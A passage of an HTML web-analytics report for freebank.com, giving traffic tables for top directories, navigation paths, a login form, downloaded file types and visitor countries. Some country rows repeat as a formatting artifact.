href="http://www.freebank.com/_fpclass">http://www.freebank.com/_fpclass</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8365</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13.27%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">94.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">56,959K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3635</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/stats">http://www.freebank.com/stats</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">698</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.1%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">96.41%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19,554K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">159</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/_private">http://www.freebank.com/_private</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">80</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.12%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">98.75%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7,131K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">75</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/_vti_bin">http://www.freebank.com/_vti_bin</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">44</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.06%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">100%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">52K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">33</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/admin">http://www.freebank.com/admin</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">33</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">96.96%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">311K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19</TD></TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/cos">http://www.freebank.com/cos</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">30</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.04%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">96.66%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17</TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopPaths"><!--Resources Accessed::Top Paths Through Site--></A> <!-- WT_H1>Top Paths Through Site</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Paths Through Site</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the paths people most often follow when visiting the site. The path begins at the page of entry and shows the next six consecutive pages viewed.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>4, .3, 4.1, .8 , .8 </WT_TABLE_STATS --> <CENTER><B>Top Paths Through Site</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Top Paths Through Site</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/index.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">37.48%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2937</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_bye.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.6%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">361</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/forrest.asp</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">330</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_1875-07.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.45%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">271</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_pics.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.09%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">164</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_essay_gl_01.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.44%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">113</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/index.htm</B><BR><I>2. http://www.freebank.com/nbf_pics.htm</I><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">109</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_books.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.37%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">108</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbfgad.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">95</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><B>1. http://www.freebank.com/nbf_controversies.htm</B><BR></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.19%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">94</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Paths Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>58.47%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>4582</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopForms"><!--Resources Accessed::Most Submitted Forms--></A> <!-- WT_H1>Most Submitted Forms and Scripts</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Submitted Forms and Scripts</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the most popular forms or scripts executed by the server. WebTrends counts any line with a Post command or a Get command with a "?" as a form or script, and shows only successful hits.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index05.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>5, .3, 2.7, 1 , 1 , 1 </WT_TABLE_STATS --> <CENTER><B>Most Submitted Forms & Scripts</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Most Submitted Forms</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Forms and/or Scripts</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>No. of Forms</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><I><A href="http://www.freebank.com/banklogin.asp">http://www.freebank.com/banklogin.asp</A></I></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">100%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopExtensions"><!--Resources Accessed::Most Downloaded File Types--></A> <!-- WT_H1>Most Downloaded File Types and Sizes</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Downloaded File Types and Sizes</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the accessed file types and the total kilobytes downloaded for each file type. Cached requests and erred hits are excluded from the totals.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index06.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>4, .3, 3.7, 1, 1</WT_TABLE_STATS --> <CENTER><B>Most downloaded File Types</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Most Downloaded File Types</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>File type</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Files</B></CENTER></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>K Bytes Transferred</B></CENTER></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>gif</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20479</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">139,325K</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>htm</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14721</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">226,990K</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>jpg</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12128</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">388,415K</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>class</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7879</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">56,956K</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>asp</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1033</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">65K</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>*.</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">102</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">29K</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>txt</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">78</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7,182K</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>html</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">75</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">61K</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>dll</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">44</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">52K</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>ida</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">33</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6K</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total Files & K Bytes Transferred</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>56572</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>819,077K</B></TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopCountries"><!--Visitors & Demographics::Most Active Countries--></A> <!-- WT_H1>Most Active Countries</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Active Countries</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the top locations of the visitors to the site by country. The country of the user is determined by the suffix of their domain name. Use this information carefully because this information is based on where the domain name of the visitor is registered, and may not always be an accurate identifier of the actual geographic location of this visitor (for example, while a vast majority of .com domain names are from the United States, there is a small minority of domain names that exist outside of the United States.)<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index07.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>3, .3, 4.7, 1</WT_TABLE_STATS --> <CENTER><B>Most Active Countries</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Most Active Countries</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Countries</CENTER></B></TD> <TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>United States&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>7453</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Canada&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>108</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia&nbsp;</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD>&nbsp;</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% 